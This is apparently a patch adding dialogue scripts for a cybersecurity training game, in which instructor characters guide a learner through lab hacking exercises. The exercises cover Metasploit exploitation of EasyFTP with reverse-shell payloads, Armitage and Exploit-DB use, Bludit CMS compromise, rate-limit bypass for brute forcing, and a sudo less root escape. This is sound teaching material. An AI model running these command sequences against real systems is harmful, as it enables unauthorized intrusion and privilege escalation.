+ ++ [Walk me through exploiting EasyFTP] + Exploitation Specialist: Let me guide you through the complete process: + + Exploitation Specialist: First, select the exploit: use exploit/windows/ftp/easyftp_cwd_fixret + + Exploitation Specialist: Check required options: show options + + Exploitation Specialist: Set the target: set RHOST TARGET_IP + + Exploitation Specialist: Choose a payload: set PAYLOAD windows/shell/reverse_tcp + + Exploitation Specialist: Set your IP for the reverse shell: set LHOST YOUR_KALI_IP + + Exploitation Specialist: Optionally check if it's vulnerable: check (though most don't support this) + + Exploitation Specialist: Launch the attack: exploit + + Exploitation Specialist: If successful, you'll get a shell on the target! + + ~ instructor_rapport += 5 + ++ [What payloads should I use?] + Exploitation Specialist: The payload depends on what you want to achieve and what the exploit supports. + + Exploitation Specialist: You can see compatible payloads with: show payloads + + Exploitation Specialist: For Windows targets, common choices include: + + Exploitation Specialist: windows/shell/reverse_tcp - Basic command shell + + Exploitation Specialist: windows/meterpreter/reverse_tcp - Powerful Meterpreter shell with advanced features + + Exploitation Specialist: For Linux targets: + + Exploitation Specialist: cmd/unix/reverse - Simple Unix shell + + Exploitation Specialist: linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux + + ~ instructor_rapport += 5 + ++ [What if the exploit doesn't work?] + Exploitation Specialist: First, run "show options" and verify all settings, especially IP addresses. + + Exploitation Specialist: Make sure you're using the correct IP - YOUR Kali IP for LHOST, and the TARGET IP for RHOST. + + Exploitation Specialist: Try restarting the target VM - sometimes services crash after failed exploit attempts. + + Exploitation Specialist: Verify the target is actually running the vulnerable software at that version. 
+ + Exploitation Specialist: Some exploits are unreliable and may need multiple attempts. + + ~ instructor_rapport += 5 + ++ [What can I do once I have a shell?] + Exploitation Specialist: With a Windows shell, you can run commands like: + + Exploitation Specialist: dir C:\ (list files) + + Exploitation Specialist: net user (list user accounts) + + Exploitation Specialist: whoami (check your privileges) + + Exploitation Specialist: For Linux shells: + + Exploitation Specialist: ls -la (list files) + + Exploitation Specialist: cat /etc/passwd (view user accounts) + + Exploitation Specialist: whoami (check current user) + + Exploitation Specialist: We'll cover post-exploitation in more depth in later labs. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== armitage_intro === +Exploitation Specialist: Armitage is a free and open source graphical interface for Metasploit with powerful automation features. + +~ instructor_rapport += 5 + +Exploitation Specialist: It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing. + +Exploitation Specialist: Armitage can scan networks, automatically suggest attacks, and visualize compromised systems. + ++ [How is Armitage different from msfconsole?] + Exploitation Specialist: Msfconsole is a command-line interface that gives you complete control and flexibility. + + Exploitation Specialist: Armitage provides a graphical interface that visualizes the network and automates finding attacks. + + Exploitation Specialist: Armitage can look at scan results and automatically suggest which exploits might work against each target. + + Exploitation Specialist: It's particularly useful for beginners or when you want to quickly test multiple targets. + + Exploitation Specialist: However, experienced penetration testers often prefer msfconsole for its power and speed. + + ~ instructor_rapport += 5 + ++ [How do I start Armitage?] 
+ Exploitation Specialist: First, initialize the Metasploit database if you haven't already: + + Exploitation Specialist: sudo msfdb reinit + + Exploitation Specialist: sudo service postgresql start + + Exploitation Specialist: Then start Armitage: armitage & + + Exploitation Specialist: The & runs it in the background so you can continue using your terminal. + + Exploitation Specialist: Leave the connection options as default and click "Connect" + + Exploitation Specialist: If prompted, allow Armitage to start the Metasploit RPC server. + + ~ instructor_rapport += 5 + ++ [What does the Armitage interface show?] + Exploitation Specialist: Armitage displays a visual network map showing discovered hosts. + + Exploitation Specialist: Each host is represented by an icon - the icon shows the detected operating system. + + Exploitation Specialist: Compromised systems are shown in red with lightning bolts. + + Exploitation Specialist: You can right-click hosts to see suggested attacks, launch exploits, or interact with shells. + + Exploitation Specialist: The interface makes it easy to see the big picture of a network and what you've compromised. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== armitage_usage === +Exploitation Specialist: Let me walk you through using Armitage to scan and exploit targets. + +~ instructor_rapport += 5 + +Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow. + ++ [How do I scan with Armitage?] + Exploitation Specialist: Click the "Hosts" menu, select "Nmap Scan", then choose a scan type. + + Exploitation Specialist: "Quick Scan (OS detect)" is a good starting point: nmap -O -sV TARGET + + Exploitation Specialist: Enter the IP address to scan and Armitage will run Nmap. + + Exploitation Specialist: Results are automatically imported into the Metasploit database and displayed visually. 
+ + Exploitation Specialist: Any previously scanned hosts in the database will also appear automatically. + + ~ instructor_rapport += 5 + ++ [How does Armitage suggest attacks?] + Exploitation Specialist: Armitage analyzes the operating system and services detected on each host. + + Exploitation Specialist: First, set the exploit rank to include more options: Armitage menu → Set Exploit Rank → Poor + + Exploitation Specialist: Then click: Attacks → Find attacks + + Exploitation Specialist: Armitage will match detected services to available exploits in Metasploit. + + Exploitation Specialist: Right-click a host and select "Attack" to see suggested exploits categorized by service. + + ~ instructor_rapport += 5 + ++ [How do I launch an attack in Armitage?] + Exploitation Specialist: Right-click the target host and select "Attack" + + Exploitation Specialist: Navigate through the menu to find the exploit - for example: ftp → easyftp_cwd_fixret + + Exploitation Specialist: Click "Launch" and Armitage will configure and run the exploit. + + Exploitation Specialist: If successful, the host icon turns red showing it's compromised! + + Exploitation Specialist: You can then right-click the compromised host to interact with shells or run post-exploitation modules. + + ~ instructor_rapport += 5 + ++ [How do I interact with a compromised system?] + Exploitation Specialist: Right-click the compromised (red) host. + + Exploitation Specialist: Look for "Meterpreter 1" or "Shell 1" depending on the payload used. + + Exploitation Specialist: Click "Interact" → "Command shell" to open a terminal. + + Exploitation Specialist: You can now run commands like "dir" on Windows or "ls" on Linux. + + Exploitation Specialist: Armitage also has menu options for common post-exploitation tasks. 
+ + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== vulnerability_databases === +Exploitation Specialist: Beyond Metasploit, there are numerous online vulnerability databases you should know about. + +~ instructor_rapport += 5 + +Exploitation Specialist: These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available. + +Exploitation Specialist: Different databases have different focuses and information, so it's worth checking multiple sources. + ++ [What are the main vulnerability databases?] + Exploitation Specialist: Here are the most important ones: + + Exploitation Specialist: CVE Details (cvedetails.com) - Searchable CVE database with statistics and visualizations. + + Exploitation Specialist: NVD (nvd.nist.gov/vuln/search) - National Vulnerability Database, the official US government repository. + + Exploitation Specialist: SecurityFocus (securityfocus.com/bid) - Bugtraq ID database with discussion forums. + + Exploitation Specialist: Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories. + + ~ instructor_rapport += 5 + ++ [What information do these databases provide?] + Exploitation Specialist: Vulnerability databases typically include: + + Exploitation Specialist: CVE numbers - unique identifiers for each vulnerability. + + Exploitation Specialist: Severity scores (CVSS) - numerical ratings of how serious the vulnerability is. + + Exploitation Specialist: Affected versions - which specific software versions are vulnerable. + + Exploitation Specialist: Technical descriptions of the vulnerability. + + Exploitation Specialist: References to patches, advisories, and sometimes proof-of-concept code. + + Exploitation Specialist: Information about whether exploits exist in the wild. + + ~ instructor_rapport += 5 + ++ [Do all vulnerabilities have CVEs?] + Exploitation Specialist: No! This is an important point. 
+ + Exploitation Specialist: CVE and NVD list officially registered security vulnerabilities, but not all possible vulnerabilities are necessarily registered and assigned CVEs. + + Exploitation Specialist: Sometimes researchers publish vulnerabilities before CVEs are assigned. + + Exploitation Specialist: Some vendors have their own vulnerability identifiers. + + Exploitation Specialist: Zero-day vulnerabilities (unknown to vendors) obviously won't have CVEs yet. + + Exploitation Specialist: This is why checking multiple sources and forums is important. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== exploit_db === +Exploitation Specialist: The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits. + +~ instructor_rapport += 5 + +Exploitation Specialist: It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code. + +Exploitation Specialist: Kali Linux includes a local copy of the entire database! + ++ [How do I search Exploit-DB online?] + Exploitation Specialist: Visit exploit-db.com and use their search function. + + Exploitation Specialist: You can search by software name, version, platform, or exploit type. + + Exploitation Specialist: Each exploit listing includes the source code, often in Python, C, PHP, or other languages. + + Exploitation Specialist: The database also categorizes exploits by type: remote, local, web application, DoS, etc. + + ~ instructor_rapport += 5 + ++ [How do I use the local Exploit-DB copy?] + Exploitation Specialist: On Kali Linux, exploits are stored in /usr/share/exploitdb/ + + Exploitation Specialist: They're organized by platform: windows, linux, osx, etc. 
+ + Exploitation Specialist: You can list Windows exploits with: find /usr/share/exploitdb/exploits/windows | less + + Exploitation Specialist: There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv + + ~ instructor_rapport += 5 + ++ [What's searchsploit?] + Exploitation Specialist: Searchsploit is a command-line tool for searching the local Exploit-DB copy. + + Exploitation Specialist: It's much faster and more convenient than manually searching files. + + Exploitation Specialist: Basic usage: searchsploit easyftp + + Exploitation Specialist: You can also use grep on the CSV file: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: To download an exploit to your current directory: searchsploit -m windows/remote/11539.py + + ~ instructor_rapport += 5 + ++ [How do I use standalone exploits from Exploit-DB?] + Exploitation Specialist: Standalone exploits often require some manual setup: + + Exploitation Specialist: You might need to edit the source code to set the target IP address. + + Exploitation Specialist: Some exploits require compilation (C/C++ code). + + Exploitation Specialist: Python exploits might need specific library dependencies. + + Exploitation Specialist: Read the exploit code comments carefully - they usually explain how to use it. + + Exploitation Specialist: Always understand what an exploit does before running it! + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== commands_reference === +Exploitation Specialist: Let me provide a comprehensive commands reference for this lab. 
+ +~ instructor_rapport += 5 + +Exploitation Specialist: **Initial Scanning:** + +Exploitation Specialist: nmap -sV 10.X.X.2-3 (scan for two servers) + +Exploitation Specialist: nmap -O -sV -p 1-65535 TARGET (comprehensive scan) + +Exploitation Specialist: **Metasploit Database Setup:** + +Exploitation Specialist: sudo msfdb reinit + +Exploitation Specialist: sudo service postgresql start + +Exploitation Specialist: msfconsole (start Metasploit console) + ++ [Show me scanning from msfconsole] + Exploitation Specialist: **Scanning from Msfconsole:** + + Exploitation Specialist: msf > nmap -O -sV TARGET + + Exploitation Specialist: msf > db_nmap -O -sV -p 1-65535 TARGET + + Exploitation Specialist: msf > db_import scan_output.xml + + Exploitation Specialist: **Database Queries:** + + Exploitation Specialist: msf > hosts (show all hosts) + + Exploitation Specialist: msf > services (show all services) + + Exploitation Specialist: msf > services -p 21 (show services on port 21) + + Exploitation Specialist: msf > services -p 21 -R (and set RHOSTS) + + ~ instructor_rapport += 3 + ++ [Show me Metasploit scanning modules] + Exploitation Specialist: **Metasploit Port Scanners:** + + Exploitation Specialist: msf > use auxiliary/scanner/portscan/ (TAB to see options) + + Exploitation Specialist: msf > use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: msf auxiliary(tcp) > set RHOSTS TARGET + + Exploitation Specialist: msf auxiliary(tcp) > set THREADS 10 + + Exploitation Specialist: msf auxiliary(tcp) > run + + Exploitation Specialist: msf auxiliary(tcp) > services + + Exploitation Specialist: msf auxiliary(tcp) > back + + ~ instructor_rapport += 3 + ++ [Show me searching for exploits] + Exploitation Specialist: **Searching for Exploits:** + + Exploitation Specialist: msf > help search + + Exploitation Specialist: msf > search easyftp + + Exploitation Specialist: msf > search type:exploit platform:Windows + + Exploitation Specialist: msf > search type:exploit 
cve:2003-0352 + + Exploitation Specialist: msf > search buffer overflow + + Exploitation Specialist: msf > search type:exploit platform:linux + + Exploitation Specialist: msf > info exploit/windows/ftp/easyftp_cwd_fixret + + ~ instructor_rapport += 3 + ++ [Show me launching exploits] + Exploitation Specialist: **Launching Exploits:** + + Exploitation Specialist: msf > use exploit/windows/ftp/easyftp_cwd_fixret + + Exploitation Specialist: msf exploit(...) > show options + + Exploitation Specialist: msf exploit(...) > set RHOST TARGET_IP + + Exploitation Specialist: msf exploit(...) > show payloads + + Exploitation Specialist: msf exploit(...) > set PAYLOAD windows/shell/reverse_tcp + + Exploitation Specialist: msf exploit(...) > set LHOST YOUR_KALI_IP + + Exploitation Specialist: msf exploit(...) > check (if supported) + + Exploitation Specialist: msf exploit(...) > exploit + + ~ instructor_rapport += 3 + ++ [Show me post-exploitation commands] + Exploitation Specialist: **Post-Exploitation Commands (Windows):** + + Exploitation Specialist: dir C:\ (list files) + + Exploitation Specialist: net user (list user accounts) + + Exploitation Specialist: whoami (check privileges) + + Exploitation Specialist: type C:\path\to\flag.txt (read file) + + Exploitation Specialist: **Post-Exploitation Commands (Linux):** + + Exploitation Specialist: ls -la (list files) + + Exploitation Specialist: cat /etc/passwd (view user accounts) + + Exploitation Specialist: whoami (current user) + + Exploitation Specialist: cat flag (read flag file) + + ~ instructor_rapport += 3 + ++ [Show me Armitage commands] + Exploitation Specialist: **Armitage Setup:** + + Exploitation Specialist: sudo msfdb reinit + + Exploitation Specialist: sudo service postgresql start + + Exploitation Specialist: armitage & + + Exploitation Specialist: **Armitage Workflow:** + + Exploitation Specialist: 1. Hosts → Nmap Scan → Quick Scan (OS detect) + + Exploitation Specialist: 2. 
Armitage → Set Exploit Rank → Poor + + Exploitation Specialist: 3. Attacks → Find attacks + + Exploitation Specialist: 4. Right-click host → Attack → select exploit → Launch + + Exploitation Specialist: 5. Right-click compromised host → Interact → Command shell + + ~ instructor_rapport += 3 + ++ [Show me Exploit-DB commands] + Exploitation Specialist: **Exploit Database:** + + Exploitation Specialist: find /usr/share/exploitdb/exploits/windows | less + + Exploitation Specialist: less /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: searchsploit easyftp + + Exploitation Specialist: searchsploit -m windows/remote/11539.py + + ~ instructor_rapport += 3 + +- -> exploitation_hub + +=== challenge_tips === +Exploitation Specialist: Let me give you practical tips for succeeding in the exploitation challenges. + +~ instructor_rapport += 5 + +Exploitation Specialist: **Finding Vulnerable Services:** + +Exploitation Specialist: Start with a comprehensive scan: nmap -sV -p 1-65535 TARGET + +Exploitation Specialist: Pay close attention to service versions - specific version numbers are key to finding exploits. + +Exploitation Specialist: Import results into Metasploit for easier targeting: db_nmap -sV TARGET + ++ [Tips for exploiting the Windows server?] + Exploitation Specialist: The Windows server is running EasyFTP with a known vulnerability. + + Exploitation Specialist: Search for it: search easyftp + + Exploitation Specialist: Look for the module ending in "cwd_fixret" + + Exploitation Specialist: Use a reverse shell payload since it's more reliable: windows/shell/reverse_tcp + + Exploitation Specialist: Make sure to set LHOST to YOUR Kali IP (the host-only network address). + + Exploitation Specialist: If the exploit fails, restart the Windows VM and try again. + + ~ instructor_rapport += 5 + ++ [Tips for exploiting the Linux server?] 
+ Exploitation Specialist: The Linux server has multiple potentially vulnerable services. + + Exploitation Specialist: Scan all ports to find everything running: nmap -sV -p- TARGET + + Exploitation Specialist: Look for services like vsftpd, IRC, or other network services. + + Exploitation Specialist: Search Metasploit for exploits matching those services. + + Exploitation Specialist: Remember to use a Unix reverse shell payload: cmd/unix/reverse + + Exploitation Specialist: Some Linux exploits are more reliable than others - you may need to try a few. + + ~ instructor_rapport += 5 + ++ [Tips for using Armitage?] + Exploitation Specialist: Armitage is great for beginners because it suggests attacks automatically. + + Exploitation Specialist: Make sure you set the exploit rank to "Poor" or you'll miss some exploits. + + Exploitation Specialist: Don't just click the first suggested attack - read the module info to understand what it does. + + Exploitation Specialist: Armitage may prompt for your Kali IP address - use the host-only network IP, not 127.0.0.1. + + Exploitation Specialist: If Armitage seems to hang, check the console tab at the bottom for error messages. + + ~ instructor_rapport += 5 + ++ [General troubleshooting advice?] + Exploitation Specialist: Always verify your IP addresses with "show options" before running exploits. + + Exploitation Specialist: RHOST should be the TARGET's IP. LHOST should be YOUR Kali IP. + + Exploitation Specialist: If services stop responding, restart the target VM - exploits often crash vulnerable services. + + Exploitation Specialist: After successfully exploiting a service once, you'll need to restart the VM to exploit it again. + + Exploitation Specialist: Be patient - some exploits take time to establish connections. + + ~ instructor_rapport += 5 + ++ [Where are the flags?] + Exploitation Specialist: For the Windows server, look on a user's Desktop. 
+ + Exploitation Specialist: Navigate with: cd C:\Users or cd C:\Documents and Settings + + Exploitation Specialist: List directories with: dir + + Exploitation Specialist: Read flag files with: type flag.txt + + Exploitation Specialist: For the Linux server, flags are typically in user home directories. + + Exploitation Specialist: Navigate with: cd /home + + Exploitation Specialist: List directories with: ls -la + + Exploitation Specialist: Read flags with: cat flag + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== ready_for_practice === +Exploitation Specialist: Excellent! You're ready to start practical exploitation. + +~ instructor_rapport += 10 +~ exploitation_mastery += 10 + +Exploitation Specialist: You now understand how to move from scanning to exploitation - the core of penetration testing. + +Exploitation Specialist: Remember: these techniques are powerful. Use them only for authorized security testing and defensive purposes. + +Exploitation Specialist: In this lab, you'll scan two servers, identify vulnerable services, and exploit them to gain access. + ++ [Any final advice before I start?] + Exploitation Specialist: Be methodical. Scan thoroughly, document what you find, research vulnerabilities, then exploit. + + Exploitation Specialist: Don't rush. Take time to understand what each exploit does and why it works. + + Exploitation Specialist: If something doesn't work, check your settings, restart the target, and try again. + + Exploitation Specialist: Try both msfconsole and Armitage to see which you prefer. + + Exploitation Specialist: Most importantly: always verify you're targeting the right system and have authorization! + + Exploitation Specialist: Good luck, Agent {player_name}. Time to put your skills to the test. + + ~ instructor_rapport += 10 + +- -> exploitation_hub + +-> END 
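Review bot: In `=== searching_exploits ===` the line "The basic syntax is: search" has lost its argument, so the learner is shown a bare `search` with nothing to search for; restore a placeholder in the style the file already uses for `TARGET_IP` and `YOUR_KALI_IP`, e.g. `search KEYWORD`. In the same file, `launching_exploits` and `commands_reference` tell the learner to `set RHOST TARGET_IP`, while `metasploit_database` says `services -p 21 -R` populates `RHOSTS`; use `RHOSTS` in all three places so the option name the learner types matches the one the database integration fills in. Finally, every question in this file is a sticky `+` choice with `~ instructor_rapport += 5` inside it, so re-selecting the same question inflates rapport without limit; either make these `*` once-only choices or move the increment under a first-visit guard.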
diff --git a/story_design/ink/game_scenarios/feeling_blu_ctf.ink b/story_design/ink/game_scenarios/feeling_blu_ctf.ink new file mode 100644 index 0000000..64cb9bd --- /dev/null +++ b/story_design/ink/game_scenarios/feeling_blu_ctf.ink 
@@ -0,0 +1,598 @@ +// Feeling Blu Challenge - Web Security CTF Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/9_feeling_blu.md +// Author: Anatoliy Gorbenko, Z. Cliffe Schreuders, Andrew Scholey +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR ctf_mastery = 0 +VAR challenge_mode = "guided" // "guided" or "ctf" + +// External variables +EXTERNAL player_name + +=== start === +CTF Challenge Coordinator: Welcome, Agent {player_name}. I'm your coordinator for the "Feeling Blu" CTF Challenge. + +~ instructor_rapport = 0 +~ ctf_mastery = 0 + +CTF Challenge Coordinator: This is your final test - a comprehensive Capture The Flag challenge that brings together everything you've learned. + +CTF Challenge Coordinator: You'll exploit a web server, gain access, escalate privileges, and hunt for flags. This simulates a real-world penetration test from start to finish. + +CTF Challenge Coordinator: Before we begin, you need to choose how you want to approach this challenge. + +-> choose_path + +=== choose_path === +CTF Challenge Coordinator: How do you want to tackle this CTF challenge? + ++ [Pure CTF mode - minimal guidance, maximum challenge] + ~ challenge_mode = "ctf" + CTF Challenge Coordinator: Excellent choice! You'll get the full Capture The Flag experience. + + CTF Challenge Coordinator: I'll give you the tools and objectives, but you'll need to figure out the approach yourself. + + CTF Challenge Coordinator: Use everything you've learned: scanning, exploitation, privilege escalation, and persistence. + + CTF Challenge Coordinator: Only come back for hints if you're truly stuck. Good luck! + + ~ ctf_mastery += 20 + -> ctf_mode_hub + ++ [Guided mode - walk me through the techniques] + ~ challenge_mode = "guided" + CTF Challenge Coordinator: A wise choice for learning! I'll guide you through each phase with explanations. 
+ + CTF Challenge Coordinator: You'll learn web application exploitation, brute forcing, post-exploitation, and privilege escalation with structured guidance. + + CTF Challenge Coordinator: This approach ensures you understand not just how to exploit, but why each technique works. + + ~ instructor_rapport += 10 + -> guided_mode_hub + +=== ctf_mode_hub === +CTF Challenge Coordinator: This is CTF mode - you're on your own! Here's what I can tell you: + +CTF Challenge Coordinator: Target: A web server running on your victim VM. + +CTF Challenge Coordinator: Objectives: Find multiple flags, gain shell access, escalate to root. + +CTF Challenge Coordinator: Tools available: Nmap, Dirb, Nikto, Metasploit, OWASP ZAP, and more. + ++ [What tools should I start with?] + CTF Challenge Coordinator: Think about the attack methodology: reconnaissance, scanning, exploitation, post-exploitation, privilege escalation. + + CTF Challenge Coordinator: Start by discovering what's running: Nmap for services, Dirb and Nikto for web enumeration. + + CTF Challenge Coordinator: Look for hidden files, admin panels, and leaked credentials. 
+ + ~ instructor_rapport += 5 + ++ [I'm stuck - give me a hint about reconnaissance] + -> ctf_recon_hints + ++ [I'm stuck - give me a hint about exploitation] + -> ctf_exploit_hints + ++ [I'm stuck - give me a hint about privilege escalation] + -> ctf_privesc_hints + ++ [Tell me about the web security tools] + -> web_tools_intro + ++ [I want to switch to guided mode] + -> switch_to_guided + ++ [I'm done - show me the solution walkthrough] + -> guided_mode_hub + ++ [That's all for now] + #exit_conversation + -> END + +=== ctf_recon_hints === +CTF Challenge Coordinator: Alright, here's a hint for reconnaissance: + +CTF Challenge Coordinator: Start with Nmap to identify services and versions: nmap -sV TARGET_IP + +CTF Challenge Coordinator: Use Dirb to find hidden directories: dirb http://TARGET_IP + +CTF Challenge Coordinator: Use Nikto for web vulnerabilities: nikto -h http://TARGET_IP + +CTF Challenge Coordinator: Look carefully at discovered files - some contain very useful information about usernames and passwords! + +CTF Challenge Coordinator: The CMS being used might have known exploits. Identify what CMS is running. + +~ instructor_rapport += 5 + +-> ctf_mode_hub + +=== ctf_exploit_hints === +CTF Challenge Coordinator: Here's a hint for exploitation: + +CTF Challenge Coordinator: You should have discovered Bludit CMS running on the server. + +CTF Challenge Coordinator: Search Metasploit for Bludit exploits: search bludit + +CTF Challenge Coordinator: You'll need both a username and password - these might have been leaked in hidden files. + +CTF Challenge Coordinator: If you only have the username, consider brute-forcing the password using OWASP ZAP. + +CTF Challenge Coordinator: The Bludit vulnerability allows arbitrary code execution and should give you a Meterpreter shell. 
+ +~ instructor_rapport += 5 + +-> ctf_mode_hub + +=== ctf_privesc_hints === +CTF Challenge Coordinator: Here's a hint for privilege escalation: + +CTF Challenge Coordinator: After gaining initial access, check what sudo commands your user can run: sudo -l + +CTF Challenge Coordinator: If your user can run certain commands with sudo, look for ways to escape from those commands to get a root shell. + +CTF Challenge Coordinator: The 'less' command is particularly interesting - it can execute shell commands with ! + +CTF Challenge Coordinator: If you can run 'less' with sudo, you can escape to a root shell! + +~ instructor_rapport += 5 + +-> ctf_mode_hub + +=== switch_to_guided === +CTF Challenge Coordinator: Switching to guided mode. I'll walk you through the complete solution. + +~ challenge_mode = "guided" + +-> guided_mode_hub + +=== guided_mode_hub === +CTF Challenge Coordinator: Welcome to guided mode. I'll walk you through each phase of the challenge. + ++ [Part 1: Information gathering and reconnaissance] + -> phase_1_recon + ++ [Part 2: Exploitation and gaining access] + -> phase_2_exploitation + ++ [Part 3: Optional - Brute forcing with OWASP ZAP] + -> phase_3_bruteforce + ++ [Part 4: Post-exploitation and flag hunting] + -> phase_4_post_exploit + ++ [Part 5: Privilege escalation to root] + -> phase_5_privesc + ++ [Tell me about web security tools first] + -> web_tools_intro + ++ [Show me the complete solution] + -> complete_walkthrough + ++ [Switch to CTF mode (no more guidance)] + ~ challenge_mode = "ctf" + -> ctf_mode_hub + ++ [That's all for now] + #exit_conversation + -> END + +=== web_tools_intro === +CTF Challenge Coordinator: Let me introduce the key web security tools you'll need. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: **Dirb** is a web content scanner that finds hidden files and directories using dictionary attacks. 
+ +CTF Challenge Coordinator: **Nikto** is a web vulnerability scanner that checks for dangerous files, outdated software, and misconfigurations. + +CTF Challenge Coordinator: **OWASP ZAP** is an intercepting proxy that lets you capture, modify, and replay HTTP requests - perfect for brute forcing. + ++ [How do I use Dirb?] + CTF Challenge Coordinator: Dirb is straightforward: dirb http://TARGET_IP + + CTF Challenge Coordinator: It uses a built-in dictionary to test common paths like /admin/, /backup/, /config/, etc. + + CTF Challenge Coordinator: Pay attention to discovered files - they often contain credentials or sensitive configuration data. + + CTF Challenge Coordinator: Right-click discovered URLs to open them in your browser and examine their contents. + + ~ instructor_rapport += 5 + ++ [How do I use Nikto?] + CTF Challenge Coordinator: Nikto scans for web vulnerabilities: nikto -h http://TARGET_IP + + CTF Challenge Coordinator: It checks for over 6,000 security issues including dangerous files, server misconfigurations, and known vulnerabilities. + + CTF Challenge Coordinator: The output shows each finding with references for more information. + + CTF Challenge Coordinator: Nikto results help you understand what attacks might be successful. + + ~ instructor_rapport += 5 + ++ [How do I use OWASP ZAP?] + CTF Challenge Coordinator: OWASP ZAP acts as a proxy between your browser and the web server. + + CTF Challenge Coordinator: It intercepts HTTP requests and responses, allowing you to modify and replay them. + + CTF Challenge Coordinator: This is incredibly useful for brute forcing login forms, especially those with CSRF protection. + + CTF Challenge Coordinator: You can also use it to bypass IP-based rate limiting with the X-Forwarded-For header. 
+ + ~ instructor_rapport += 5 + +- -> {challenge_mode == "ctf": ctf_mode_hub | guided_mode_hub} + +=== phase_1_recon === +CTF Challenge Coordinator: Phase 1 is all about information gathering - discovering what you're dealing with before launching attacks. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: The attack methodology follows this sequence: reconnaissance, scanning, exploitation, post-exploitation, and privilege escalation. + +CTF Challenge Coordinator: Each phase builds on the previous, so thorough reconnaissance is crucial. + ++ [What should I scan for?] + CTF Challenge Coordinator: Start with network reconnaissance: nmap -sV TARGET_IP + + CTF Challenge Coordinator: This identifies open ports, running services, and software versions. + + CTF Challenge Coordinator: Then scan the web application: dirb http://TARGET_IP + + CTF Challenge Coordinator: Follow up with: nikto -h http://TARGET_IP + + CTF Challenge Coordinator: Look for admin panels, configuration files, backup files, and anything that might contain credentials. + + ~ instructor_rapport += 5 + ++ [What am I looking for specifically?] + CTF Challenge Coordinator: You're looking for several things: + + CTF Challenge Coordinator: What CMS (Content Management System) is running? This tells you what exploits might work. + + CTF Challenge Coordinator: Are there leaked credentials in discovered files? Check text files, logs, and backups. + + CTF Challenge Coordinator: Is there an admin login page? You might need to access it. + + CTF Challenge Coordinator: What server software and versions are running? This helps identify known vulnerabilities. + + CTF Challenge Coordinator: There's also a flag hidden in one of the discovered files! + + ~ instructor_rapport += 5 + ++ [Walk me through the reconnaissance process] + CTF Challenge Coordinator: Here's the step-by-step process: + + CTF Challenge Coordinator: 1. 
Run Nmap: nmap -sV -p- TARGET_IP (scan all ports with version detection) + + CTF Challenge Coordinator: 2. Run Dirb: dirb http://TARGET_IP (find hidden directories and files) + + CTF Challenge Coordinator: 3. Run Nikto: nikto -h http://TARGET_IP (identify web vulnerabilities) + + CTF Challenge Coordinator: 4. Browse discovered URLs - open them in Firefox to see what they contain + + CTF Challenge Coordinator: 5. Look for patterns: usernames on the website, admin pages, leaked files + + CTF Challenge Coordinator: 6. Document everything - the CMS name, discovered usernames, any found credentials + + CTF Challenge Coordinator: The reconnaissance might reveal Bludit CMS with an admin login at /admin/ + + ~ instructor_rapport += 5 + +- -> guided_mode_hub + +=== phase_2_exploitation === +CTF Challenge Coordinator: Phase 2 is exploitation - using discovered vulnerabilities to gain access. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: Based on your reconnaissance, you should have identified Bludit CMS running on the server. + +CTF Challenge Coordinator: Bludit has known vulnerabilities that we can exploit using Metasploit. + ++ [How do I find Bludit exploits?] + CTF Challenge Coordinator: In Metasploit, search for Bludit: search bludit + + CTF Challenge Coordinator: You'll find several modules. Look for ones related to code execution or file upload. + + CTF Challenge Coordinator: Use info to read about each exploit: info exploit/linux/http/bludit_upload_images_exec + + CTF Challenge Coordinator: This particular exploit allows arbitrary code execution through image upload functionality. + + ~ instructor_rapport += 5 + ++ [What do I need to exploit Bludit?] 
+ CTF Challenge Coordinator: The Bludit exploit requires several pieces of information: + + CTF Challenge Coordinator: RHOSTS: The target IP address + + CTF Challenge Coordinator: BLUDITUSER: The Bludit admin username (should have been discovered during recon) + + CTF Challenge Coordinator: BLUDITPASS: The admin password (might have been leaked, or you'll need to brute force it) + + CTF Challenge Coordinator: TARGETURI: Typically / (the root of the web server) + + CTF Challenge Coordinator: The exploit will give you a Meterpreter shell if successful! + + ~ instructor_rapport += 5 + ++ [What if I don't have the password?] + CTF Challenge Coordinator: If you found the username but not the password, you have options: + + CTF Challenge Coordinator: Check all discovered files thoroughly - passwords are sometimes leaked in config files or backups + + CTF Challenge Coordinator: If truly not found, you can brute force it using OWASP ZAP (covered in optional Phase 3) + + CTF Challenge Coordinator: Bludit has CSRF protection and rate limiting, making brute forcing tricky but possible + + ~ instructor_rapport += 5 + ++ [Walk me through the exploitation] + CTF Challenge Coordinator: Here's the complete exploitation process: + + CTF Challenge Coordinator: 1. Start Metasploit: msfconsole + + CTF Challenge Coordinator: 2. Search: search bludit + + CTF Challenge Coordinator: 3. Use the upload_images exploit: use exploit/linux/http/bludit_upload_images_exec + + CTF Challenge Coordinator: 4. Show options: show options + + CTF Challenge Coordinator: 5. Set target: set RHOSTS TARGET_IP + + CTF Challenge Coordinator: 6. Set username: set BLUDITUSER admin (or discovered username) + + CTF Challenge Coordinator: 7. Set password: set BLUDITPASS + + CTF Challenge Coordinator: 8. Run exploit: exploit + + CTF Challenge Coordinator: If successful, you'll get a Meterpreter shell! This is your foothold in the system. 
